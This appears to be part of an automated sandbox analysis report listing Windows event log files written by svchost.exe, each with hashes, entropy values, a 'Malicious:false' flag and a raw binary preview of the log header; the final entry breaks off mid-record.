                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.8432997252442703
                                                      Encrypted:false
                                                      SSDEEP:384:4hZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+l9:4WXSYieD+tvgzmMvRpBWfb
                                                      MD5:39EE3557626C7F112A88A4DE12E904C1
                                                      SHA1:C307FECC944D746A49EEA6451B7DA7301F03504C
                                                      SHA-256:2B47146267E6F31192C54D3EDA77EC9ABE6A88B1C72BA9FE789C8073FD632A5A
                                                      SHA-512:304C866E246B3F63BF126B33AED784913A078D44913FD987D896D2D960578B61BA7E24BA3CB8FC76608AB1E5702D0FE587A5FB8C38CDF8913D60F88B1435A2D9
                                                      Malicious:false
                                                      Preview:ElfChnk......................................"...&.....k.....................................................................n..................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................."..................................**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-DPAPI%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.9223892466691472
                                                      Encrypted:false
                                                      SSDEEP:384:whqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28t:wbCyhLfIXBS5
                                                      MD5:93BC7C28E3A7B0EC7634432FFB5F26AE
                                                      SHA1:388548D6291DA80F672153D1C18E32BDA335AA90
                                                      SHA-256:D354F4EA745283540D197B6D4C57EFC4F539F7566CFB3A06AEBD1243CD222EE1
                                                      SHA-512:3235FEA5A58C72DCD680D436AA2652F5221C6AC6F5A53882C7817A8A65E63C13087CD5660839FC7CFA0F62C666014608B91ABB4235EF5F79F68EF5806252F84A
                                                      Malicious:false
                                                      Preview:ElfChnk.........F...............F...............P............................................................................*................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n...................................................6...................................**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Crypto-NCrypt%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.838106263184782
                                                      Encrypted:false
                                                      SSDEEP:768:ccMhFBuyKskZljdoKXjtT/r18rQXn8r3e5POH:JMhFBuVge
                                                      MD5:A2D41740C1BAF781019F282E37288DDF
                                                      SHA1:A6FE635B3EC8A6923EDE10C23FC79DD32EF4F621
                                                      SHA-256:7008D3010B17C0B09643D10D26B19FB971BB1963C414C1466BEAD617CF9F15E7
                                                      SHA-512:E33A0A2F9473D2D05E9704FE16E6EE34FB51FD8E25A3D60E1F7A67665CA14421B6511D896526AFC7CAE1BF629BB7013FA10663620C5450F1BB51A465EF5A51CB
                                                      Malicious:false
                                                      Preview:ElfChnk.........?...............?...................<.md.....................................................................?.Q................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A......&...................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnosis-DPS%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.634418630947688
                                                      Encrypted:false
                                                      SSDEEP:768:/VQ+uYvAzBCBao/F6Cf2SEqEhwaK41HZaUeI36ISKEeKRe:cH
                                                      MD5:A00BAFFCABB00428EA0512FCECCC55E5
                                                      SHA1:19F7C942DC26C3FF56D6240158734AFF67D6B93E
                                                      SHA-256:92264C9E28AB541669DED47CFAF1E818EBD863FA9E8FC6B0F52175D694A9E0D9
                                                      SHA-512:DF94AA8FA0610A0EFE7BAC0DB2A01645A4CD1C7FAD62E914EF914B526B651ED62600F63909D26149FD17C259348DADE05F48759B1DF092970251DB86690CC2B6
                                                      Malicious:false
                                                      Preview:ElfChnk.........m...............m.....................]......................................................................p.................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................................%0......**..@...........WW. ..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Diagnostics-Performance%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.0646587531847893
                                                      Encrypted:false
                                                      SSDEEP:384:eh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDK:eMAP1Qa5AgfQQgniwS
                                                      MD5:399CAF70AC6E1E0C918905B719A0B3DD
                                                      SHA1:62360CD0CA66E23C70E6DE3340698E7C0D789972
                                                      SHA-256:FD081487CCB0ACEAD6F633AADBA4B977D2C9360CE8EAC36EAB4E3C84A701D849
                                                      SHA-512:A3E17DA61D4F7C0C94FD0B67707AE35250656842D602906DE515B5E46ECD5078AC68AE607B99DC1A6061B0F896759FE46FF8EE350774205635D30363D46939EA
                                                      Malicious:false
                                                      Preview:ElfChnk......................................g...j..%s.g........................................................................................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&...........c..;...............................**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-GroupPolicy%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.4364303862010575
                                                      Encrypted:false
                                                      SSDEEP:384:PhrE2E+EAsbE3VgEWsUiEcEf4eEOhEmELVFEEE5ejElEreEFEzEAEWE+EWEeEKEy:P3sleByhfIwPGa1SEzy
                                                      MD5:2BB73ACC8F7419459C4BF931AB85352C
                                                      SHA1:F1CE2EB960D3886F76094E2327DD092FC1208C7E
                                                      SHA-256:1969400F6FC72AD4A41092FEC53A19078C98DE9FCB2507A3BD8E1930B2447B62
                                                      SHA-512:7D882184DA11B490E111502C8193B73248259D43CC5DCE021CD7264212F1BCD3D62F2A3A2F86929663E2E904961D4F1E406E314020FE904D41694A09C1EB0457
                                                      Malicious:false
                                                      Preview:ElfChnk.p...............p..................../...1..V......................................................................H...................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...........................................m................*..............%................ ..................&............0......................**......p..........T..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-HelloForBusiness%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):3.0631557320109892
                                                      Encrypted:false
                                                      SSDEEP:384:xhYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3KlZ:x1T4hGvj
                                                      MD5:86AEA3A9CA3E5909FD44812754E52BD6
                                                      SHA1:F79B583F83F118AC724A5A4206FC439B88BB8C65
                                                      SHA-256:2AB21F158F9FFA0A375B2ABBD58880A732FABBC436246D40A68DD88D324428C9
                                                      SHA-512:17796DAA6BCE3C6B7EBACD2A683D085AB08C7701DB5FF91DC2D6531E9CC23FCFC52650A6CD02D8B54D4E8C8D5B59DB1688E18571587E0431E4AA914086BE26F5
                                                      Malicious:false
                                                      Preview:ElfChnk.........b...............b...............0...o5@r.....................................................................2..................V.......................T...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.............................................................../.......................**............... .$..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-Boot%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.4467272005363894
                                                      Encrypted:false
                                                      SSDEEP:384:EEhFiDhKxDmqIDrfDYEDdDDDbDOD2DSD+DtDFDxDlDUDEDoDADeDuDx4DWDXDjD6:JzSKEqsMuy6TN
                                                      MD5:155681C222D825199B738E8DEC707DC8
                                                      SHA1:704C800E7313F77A218203554E1428DF2819BC34
                                                      SHA-256:1505E543085CB6AA30119F10DF11AC8CE061DB0CAC6D44A640E711F96750C4BF
                                                      SHA-512:ADDDE8E26D330EAA13F993D17FF4A6DE7F4120E5B36205EB69FC999B0462B21FD189317EFD1002618551EE24E5C753A09EB34955E8CF1A8E2A22D27516BAB720
                                                      Malicious:false
                                                      Preview:ElfChnk.........L...............L...........x.......ZZO.........................................................................................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......................................=............................................y..................................**...............v?..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-ShimEngine%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.156155224835584
                                                      Encrypted:false
                                                      SSDEEP:384:MhMLzI9ozTxzFEz3zLzWztCzizQzzz5zqfzDz5z1zkzSz9zEzWz+zQzqbzUTz3zE:Mmw9g3LU
                                                      MD5:F22AC858C2ACC96E8F189E43FFE46FBD
                                                      SHA1:540B8276921D37FCFFDA3FC7BCFAE1D99A85433B
                                                      SHA-256:771A6E4098CB30081338F06DD7C0B54248C133F9B7B6849FDADDBD6E6FD5BCE9
                                                      SHA-512:B4CF3C51B9FB236207B19FE697CEF6E402C6C903E7570B3938F529E5438F96E230463B9A9B17784A98E580E2B18AA9626E96AA83F705D506AF9C2A0432F0F7D5
                                                      Malicious:false
                                                      Preview:ElfChnk.........6...............6........... o...p..k.?........................................................................x................J.......................r...=...........................................................................................................................f...............?...........................m...................M...F...........................&.......E.......................n.......#...........................................~i..................................**..............j...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Kernel-WHEA%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):1.9197999988543422
                                                      Encrypted:false
                                                      SSDEEP:384:ehqID7I26vIxIPIttIo0IPrI5IMILIjI7I1IIIfrIBBLIgITI:ecx
                                                      MD5:6C3F290FC62CFA9C240AEE8DB1DBA277
                                                      SHA1:CFACCF81F3AA31E8DE85CEAFDAA55AA90FA18BEC
                                                      SHA-256:7841FBB35636229AFB0389965D3DDBD0B7DF4858F1DA8A8FF434830DB8B133D6
                                                      SHA-512:D2C60875EFADB1F3421CDC095B00E32419C0266CB4F58B17AF09A82AAA20EB488C757BA07E7562A033B84A37B3E035C405200BFB29330F79CA565FF21F5EDA88
                                                      Malicious:false
                                                      Preview:ElfChnk.K.......L.......K.......L...........x...86.....U......................................................................+.................$.......................L...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..x...K.........tQ..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Known Folders API Service.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:MS Windows Vista Event Log, 2 chunks (no. 1 in use), next record no. 143, DIRTY
                                                      Category:dropped
                                                      Size (bytes):76040
                                                      Entropy (8bit):4.551581036940398
                                                      Encrypted:false
                                                      SSDEEP:768:ELjpPv++M48PFVbUa+5DdDLjpPv++M48PFVbUa+5DdyY20sMY3Dp13/n/ydIxm6c:TU
                                                      MD5:9550348718E36BF2728FAD844B7E4F7D
                                                      SHA1:9E1EBA342A62B2E8415B10ADA70134D47C25E5A7
                                                      SHA-256:71A44332B4E178246D35CC2D0646813E9EEB5AD883FD6602C15C14384B091B3A
                                                      SHA-512:77FEC5CD31656DE999002CADA163115D414D7DFD60DCCB6A2CA34E3E262A65505D42F4BAB15F70F51227B8AF24F970A7D453A6D3B40A0E6AEB123989280376F8
                                                      Malicious:false
                                                      Preview:ElfFile.....................................................................................................................I..ElfChnk......................................$...(...\.d....................................................................D.2v................H.......................p...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&.......!............................................$..................................**..X.............................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d.

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-LiveId%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):5.718426658668259
                                                      Encrypted:false
                                                      SSDEEP:384:Thka5Ka5WsR9o2KbzyzIz7a5NsR9o2KbzyzIzia5zzuzNz0zxzuewKWMK/2a55wt:Tdqlt94xODljQdM
                                                      MD5:8630011707C7BFBCECC0A9430637802E
                                                      SHA1:22247A5B6A4C01883BB14E0BD4575A3553F945CB
                                                      SHA-256:227057F9899098B21709D53114E9DECFFCD28207BFFA178AD6B1E32F9C63EDDF
                                                      SHA-512:972629871B28EA6D01B8762B28378F8348E592BD465FE7FD1CF6AB5BD62157230AD3BB729F6290F6EDA950AB20598110676D902756E40BA3067ED37831855076
                                                      Malicious:false
                                                      Preview:ElfChnk.%......./.......%......./...........(l...n.........................................................................b\.;................ .......................H...=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&........................6..........**..P...%.......'wu~..............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-NCSI%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.9963080376858662
                                                      Encrypted:false
                                                      SSDEEP:384:l7h1hM7MpMEaMWFMu/Ma2M+AMmGM1cMNF3Mg9Ml7MABMczM0cMKhMLaMA0MJvMZy:l7eJw
                                                      MD5:A51AFE78FA4481FA05EDC1133C92B1D8
                                                      SHA1:5BA44E7A99EE615E323696742DA6B930E9FF6198
                                                      SHA-256:44C1977D16383DF6B1FFF8164F319DFD99092A124ABA7C7280D74A6BB8AD2094
                                                      SHA-512:792E5E8F5540DCA4B7F003C1043DCBC3E0EC3F23EC4A7B0FA84357F6ABDFD84122C124DBEA2B61D3B5CEED79A3E158DBE95DFCDB20EEAC433D9CDC29C3328F22
                                                      Malicious:false
                                                      Preview:ElfChnk......................................)..0-....\.....................................................................|..........................................>...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................................................................)..................................**..............c...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-NetworkProfile%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.076996627399968
                                                      Encrypted:false
                                                      SSDEEP:384:Ihk1EL1I1Vh1C1D161f1f181L1tY1VGm1Q1L1p1VG1U1Z1s1VA141c1Vc1q1tS12:IBjdjP0cs6N
                                                      MD5:A8ADBDC2B39B55444B2C844F7D81EBDE
                                                      SHA1:F97F40E314C8A2A39953A28CB72C9270D3073418
                                                      SHA-256:93CF0EF4C121FCBB18A8A6DA5912415AF1113816BE6A8F9B86BE6A2243408E09
                                                      SHA-512:922D165CBE871A393D58DAABABE7D09557E242BF73C2C473C29CCB0FB3277B8119911EFF51B12238D23B613AD9C15DAB163C9757BC9006D768B2345F53436E7B
                                                      Malicious:false
                                                      Preview:ElfChnk.........................................X...Y}.......................................................................(.[................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................A.......................................................**..............*5.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):83408
                                                      Entropy (8bit):3.465895899791719
                                                      Encrypted:false
                                                      SSDEEP:384:3KILbwI+IUIyI2I4bXImLIjcMIRI9IJIoINIcIcFIuIQITI4IYIDvHIZIDhhDIEu:3TrxhZxGp99r
                                                      MD5:700E6D05B3FC566FEF16966161DEF5A5
                                                      SHA1:ABC0B9E9B627412AA777AB071FEA0D1D7DD0CD7E
                                                      SHA-256:2416AD57DCEAD470B1DD3054229786FF429C5A1167637C1859C1D04ED6888A15
                                                      SHA-512:8DD1B3D4CCA3037374ED650CEC59A07B88C95C7386BCE3AF6EF416FE4490F6CA5A7671259ADD88A52E2E13E89EEBE79197FA4FF66E72F3D3A14A0D3CE7E5AC54
                                                      Malicious:false
                                                      Preview:ElfChnk.T...............T...................P...h...[.........................................................................G........................................>...=...........................................................................................................................f...............?...........................m...................M...F............................................................n..................1................................a......a...........................**......z...........!.............a..............................................................,.......D.....!........... ....@....!....&O....h!'O............z....................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s..z.?..nM.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.N.t.f.s./.O.p.e.r.a.t.i.o.n.a.l........n..&.......6p.\.#i....>..........2........A..=...>.../....=.......V.o.l.u.m.e.C.o.r.r.e.l.a.t.i.o.n.I.d.......A..7...>...)....=.......V.o.l.u.m.e.N.a.m.e.L.e.n.g.t.h....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Ntfs%4WHC.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):0.801423310886069
                                                      Encrypted:false
                                                      SSDEEP:384:dh6iIvcImIvITIQIoIoI3IEIMIoIBIDIcIwISIEzIJVI:doxJS
                                                      MD5:9EAAD7982F42DFF47B8EF784DD2EE1CC
                                                      SHA1:542608204AF6B709B06807E9466F7543C0F08818
                                                      SHA-256:5468A48533B56DE3E8C820B870493154775356CE3913AD70EC51E0D1D0D1A366
                                                      SHA-512:036BFABE2AC4AD623B5C439349938C0EA254BFCDAB9096A53253189D4F632A8A8A1DD00644A4573AF971AAEA6831317BFD663E35363DD870684CDD4C0A51884C
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................X ...#..\.N......................................................................12.............................................=...........................................................................................................................f...............?...........................m...................M...F...........................&...................................................................................~ ..................................**..............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-Partition%4Diagnostic.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):2.996272372482282
                                                      Encrypted:false
                                                      SSDEEP:768:e4u1n8zfFFU1x4Dk13xIb13xIb13xIt13xIi13xI513xIU13xI013xIF13xIH137:M
                                                      MD5:4F68D6AF0C7DB9E98F8B592C9A07811C
                                                      SHA1:9F519109344DD57150F16B540AAA417483EF44FE
                                                      SHA-256:44177E6F71E240EBFE9CE63FEFBF5D46A01979E09C0C14F65F1D19AE8E97B8EE
                                                      SHA-512:E1D5097BCD572F3DBAF4024FAEA76BAD3061CD2E05017701B578020327969C2BD3F725FBE8BFE4C40DC66336CE1371E7AB037058603B02449366DAE4EDE8DE69
                                                      Malicious:false
                                                      Preview:ElfChnk.....................................(...8...S......................................................................V..C................(.......................P...=...........................................................................................................................f...............?...........................m...................M...F...........................&................................ ..................................................N...................................**...............................&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):69752
                                                      Entropy (8bit):3.7922843548336367
                                                      Encrypted:false
                                                      SSDEEP:768:YNYNwutDBjV8k+PS7eUtHpoVWWB07SZRcZv76NcRUjGHzLKvc90XKcZv76NcRkpI:UUwutDBjV8k+67PtHpoVW
                                                      MD5:BFB69ACAD0D04FB62869D07A7A74DBA6
                                                      SHA1:4A880A73E618177CACBAE617F19E77042946379F
                                                      SHA-256:D09BF5087852F5E082CB778ABC33E0648AB5FEA32448C70EF1EF93595B774E33
                                                      SHA-512:722D0E862B9A5A7865B77CF2DC484E18D0FC7F39D9CC1075E9BEA4CAA57E1B87340DF83A3D452CEF4D99A40D164A8A49A5A3A3ABB919927E70B7190F86208EBF
                                                      Malicious:false
                                                      Preview:ElfChnk.................O.......T...............x...^.........................................................................;................0...........................=...........................................................................................................................f...............?...........................m...................M...F...............................................................................................................&...................................**..`...O.........I..!............&............"3WI..L..........A..|...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

                                                      C:\Windows\System32\winevt\Logs\Microsoft-Windows-PushNotification-Platform%4Operational.evtx

                                                      Download File
                                                      Process:C:\Windows\System32\svchost.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):65536
                                                      Entropy (8bit):4.738711518598647
                                                      Encrypted:false
                                                      SSDEEP:384:Fh+rKvKaKNP6WKkvKWKlpKuyK7YKmKaKHxqKWyK11KUIKqKq9KLjK5yKoKfKYKnJ:FkN2cTOsKZDY7aVZc55NrjzDbRt
